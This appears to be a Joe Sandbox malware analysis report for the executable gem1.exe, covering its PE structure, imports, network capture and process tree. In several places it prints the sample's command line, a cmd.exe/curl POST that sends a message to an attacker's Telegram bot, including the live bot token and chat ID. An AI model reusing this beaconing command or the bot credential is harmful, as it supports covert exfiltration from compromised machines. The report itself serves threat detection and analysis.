                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xf7c0x1000b7b11753494e5d7dd5afafdaad4a418eFalse0.642822265625data5.958966256529513IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x20000x102c0x1200ef1e3f5c67993713817929fb60ec2286False0.3743489583333333data4.014436411183955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x40000x6800x20085c2aebd011c5c1b37c1009def59c2b6False0.09375data0.5324895658143383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .pdata0x50000x18c0x200f5ac1092c2daf7847701c7ccc986ca70False0.47265625PEX Binary Archive3.110000732430896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x60000x1e00x200d223c232889289f7388583adeff234e1False0.525390625data4.697597008251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x70000x300x200d8ba282c8a10920ec6dc9b480f625169False0.125data0.7225426795343004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_MANIFEST0x60600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                        DLLImport
                                        VCRUNTIME140.dll__current_exception_context, __current_exception, __C_specific_handler, memset, memcpy
                                        api-ms-win-crt-runtime-l1-1-0.dll_crt_atexit, terminate, system, _seh_filter_exe, _register_onexit_function, _c_exit, _cexit, __p___argv, __p___argc, _set_app_type, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _register_thread_local_exe_atexit_callback, _initialize_onexit_table
                                        api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsnprintf_s, __p__commode, _set_fmode
                                        api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                        api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
                                        KERNEL32.dllGetCurrentThreadId, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, RtlCaptureContext, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-09T15:28:54.759276+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549706149.154.167.220443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 9, 2025 15:28:54.048378944 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.048446894 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:54.048533916 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.110399008 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.110488892 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:54.750452042 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:54.750777006 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.755610943 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.755628109 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:54.755861998 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:54.759113073 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:54.799343109 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:55.003659964 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:55.003741026 CET44349706149.154.167.220192.168.2.5
                                        Jan 9, 2025 15:28:55.003804922 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:55.013514996 CET49706443192.168.2.5149.154.167.220
                                        Jan 9, 2025 15:28:55.013530970 CET44349706149.154.167.220192.168.2.5
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 9, 2025 15:28:54.017193079 CET5622153192.168.2.51.1.1.1
                                        Jan 9, 2025 15:28:54.026272058 CET53562211.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 9, 2025 15:28:54.017193079 CET192.168.2.51.1.1.10xb5caStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 9, 2025 15:28:54.026272058 CET1.1.1.1192.168.2.50xb5caNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        • api.telegram.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549706149.154.167.2204436396C:\Windows\System32\curl.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-09 14:28:54 UTC211OUTPOST /bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage HTTP/1.1
                                        Host: api.telegram.org
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Content-Length: 42
                                        Content-Type: application/x-www-form-urlencoded
                                        2025-01-09 14:28:54 UTC42OUTData Raw: 63 68 61 74 5f 69 64 3d 37 34 33 37 34 30 33 38 34 36 26 74 65 78 74 3d cf f0 ee e3 f0 e0 ec ec e0 20 e7 e0 ef f3 f9 e5 ed e0
                                        Data Ascii: chat_id=7437403846&text=
                                        2025-01-09 14:28:55 UTC346INHTTP/1.1 400 Bad Request
                                        Server: nginx/1.18.0
                                        Date: Thu, 09 Jan 2025 14:28:54 GMT
                                        Content-Type: application/json
                                        Content-Length: 91
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2025-01-09 14:28:55 UTC91INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 73 74 72 69 6e 67 73 20 6d 75 73 74 20 62 65 20 65 6e 63 6f 64 65 64 20 69 6e 20 55 54 46 2d 38 22 7d
                                        Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: strings must be encoded in UTF-8"}


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:09:28:53
                                        Start date:09/01/2025
                                        Path:C:\Users\user\Desktop\gem1.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\gem1.exe"
                                        Imagebase:0x7ff662620000
                                        File size:11'776 bytes
                                        MD5 hash:AC4B32D014D380C67FBEA66FAF32AE99
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:09:28:53
                                        Start date:09/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:09:28:53
                                        Start date:09/01/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
                                        Imagebase:0x7ff610f60000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:09:28:53
                                        Start date:09/01/2025
                                        Path:C:\Windows\System32\curl.exe
                                        Wow64 process (32bit):false
                                        Commandline:curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
                                        Imagebase:0x7ff6e7c00000
                                        File size:530'944 bytes
                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:22.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:21.6%
                                          Total number of Nodes:51
                                          Total number of Limit Nodes:3
                                          execution_graph 398 7ff6626211f8 401 7ff662621a24 SetUnhandledExceptionFilter 398->401 402 7ff662621130 403 7ff662621140 402->403 411 7ff662621598 403->411 405 7ff662621880 9 API calls 406 7ff6626211e5 405->406 407 7ff662621164 _RTC_Initialize 409 7ff66262118e 407->409 416 7ff662621820 RtlInitializeSListHead 407->416 409->405 410 7ff6626211d5 409->410 412 7ff6626215a9 411->412 415 7ff6626215ae __scrt_acquire_startup_lock 411->415 413 7ff662621880 9 API calls 412->413 412->415 414 7ff662621622 413->414 415->407 417 7ff662621390 420 7ff662621760 417->420 421 7ff662621399 420->421 422 7ff662621783 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 420->422 422->421 423 7ff662621342 424 7ff6626219d0 GetModuleHandleW 423->424 425 7ff662621349 424->425 359 7ff662621214 360 7ff66262122d 359->360 361 7ff66262136b 360->361 362 7ff662621235 __scrt_acquire_startup_lock 360->362 378 7ff662621880 IsProcessorFeaturePresent 361->378 364 7ff662621375 362->364 367 7ff662621253 __scrt_release_startup_lock 362->367 365 7ff662621880 9 API calls 364->365 366 7ff662621278 365->366 367->366 372 7ff662621080 367->372 371 7ff662621327 371->366 373 7ff6626210da 372->373 384 7ff662621110 373->384 376 7ff6626219d0 GetModuleHandleW 377 7ff6626219e1 376->377 377->371 379 7ff6626218a6 378->379 380 7ff6626218b4 memset RtlCaptureContext RtlLookupFunctionEntry 379->380 381 7ff66262192a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 380->381 382 7ff6626218ee RtlVirtualUnwind 380->382 383 7ff6626219aa 381->383 382->381 383->364 385 7ff662621119 384->385 386 7ff6626210f7 385->386 387 7ff6626213d8 IsProcessorFeaturePresent 385->387 386->376 388 7ff6626213f0 387->388 393 7ff6626214ac RtlCaptureContext 388->393 394 7ff6626214c6 RtlLookupFunctionEntry 393->394 395 7ff6626214dc RtlVirtualUnwind 394->395 396 7ff662621403 394->396 395->394 395->396 397 7ff6626213a4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 396->397

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00007FF662621868 1 Function_00007FF6626214AC 2 Function_00007FF662621130 3 Function_00007FF662621830 2->3 6 Function_00007FF662621834 2->6 8 Function_00007FF662621818 2->8 9 Function_00007FF662621598 2->9 10 Function_00007FF66262185C 2->10 12 Function_00007FF662621820 2->12 23 Function_00007FF662621748 2->23 24 Function_00007FF66262180C 2->24 27 Function_00007FF662621A90 2->27 31 Function_00007FF662621810 2->31 40 Function_00007FF662621880 2->40 42 Function_00007FF662621840 2->42 4 Function_00007FF662621870 5 Function_00007FF6626216B5 7 Function_00007FF662621A34 34 Function_00007FF662621DD4 9->34 9->40 11 Function_00007FF66262155C 11->3 22 Function_00007FF662621B08 11->22 13 Function_00007FF662621520 13->34 14 Function_00007FF662621760 15 Function_00007FF6626216E0 15->3 16 Function_00007FF6626213A4 17 Function_00007FF662621A24 18 Function_00007FF662621624 19 Function_00007FF662621EA4 20 Function_00007FF662621F64 21 Function_00007FF662621F46 25 Function_00007FF66262170C 23->25 26 Function_00007FF662621ACC 28 Function_00007FF662621390 28->14 29 Function_00007FF662621010 41 Function_00007FF662621000 29->41 30 Function_00007FF662621110 30->1 30->16 32 Function_00007FF6626219D0 33 Function_00007FF662621214 33->0 33->4 33->11 33->13 33->15 33->18 33->32 38 Function_00007FF6626216BC 33->38 39 Function_00007FF662621080 33->39 33->40 35 Function_00007FF662621878 36 Function_00007FF6626211F8 36->17 36->24 37 Function_00007FF662621838 38->34 39->29 39->30 40->35 42->37 42->41 43 Function_00007FF662621342 43->32 44 Function_00007FF662621E84 44->19

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true
                                          • Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd
                                          Similarity
                                          • API ID: __scrt_acquire_startup_lock__scrt_release_startup_lock
                                          • String ID:
                                          • API String ID: 3055961719-0
                                          • Opcode ID: 93a1e1bc6022631f4bd445f8765c4935dc323af9d1f72023d73b8ae34566eeaf
                                          • Instruction ID: 1b0f2c2ab0acefe7e3ab914a5fe53a5e88728a5ebed1377be0424e3e0612b26b
                                          • Opcode Fuzzy Hash: 93a1e1bc6022631f4bd445f8765c4935dc323af9d1f72023d73b8ae34566eeaf
                                          • Instruction Fuzzy Hash: C9314CA1E0F143C3EF14AB2194513B912B1AF4578CF4400B4EA4DCF6D7DEEEA845A781

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true
                                          • Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                          • String ID:
                                          • API String ID: 313767242-0
                                          • Opcode ID: 550b66adce13fbede535541e62ac0f56b9da69d949697b5386e86e1094862265
                                          • Instruction ID: af3fb36cc17ef369c6e4342cf3c6d3042aee2bfc20393877e251e9b2d3bb0698
                                          • Opcode Fuzzy Hash: 550b66adce13fbede535541e62ac0f56b9da69d949697b5386e86e1094862265
                                          • Instruction Fuzzy Hash: 913121B2619B81C6EB608F60E8807ED7370FB84748F44443ADA4D9BB99DF79D648D710

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true
                                          • Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd
                                          Similarity
                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                          • String ID:
                                          • API String ID: 2933794660-0
                                          • Opcode ID: a77de6920fbe06627394d409d93dd5500b4708a59dfe997caffd1c0562e18aad
                                          • Instruction ID: 0356814cfc6988945f26d07ed8aefee007610f0fb3bc2128ab32f71206d21ea4
                                          • Opcode Fuzzy Hash: a77de6920fbe06627394d409d93dd5500b4708a59dfe997caffd1c0562e18aad
                                          • Instruction Fuzzy Hash: C7111C62B15B45CAEF008F60E8542B833B4FB59758F441E31DA6DCABA8DFB8D198C340
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2041732687.00007FF662621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF662620000, based on PE: true
                                          • Associated: 00000000.00000002.2041713236.00007FF662620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041747210.00007FF662622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2041785248.00007FF662625000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff662620000_gem1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cf45aa958c34dd02e9bd6e2e8a18028edfec3694967a3d27f930b40693e62de
                                          • Instruction ID: 7ce0e30fb28e120596ba760b3f66337dd983a62a2bb2dc6912efa9bf6c79fa94
                                          • Opcode Fuzzy Hash: 8cf45aa958c34dd02e9bd6e2e8a18028edfec3694967a3d27f930b40693e62de
                                          • Instruction Fuzzy Hash: 13A002E1D1FD42D2EF058B00E9506B02331FB64308B410172C00DCDC69DFBDA501E710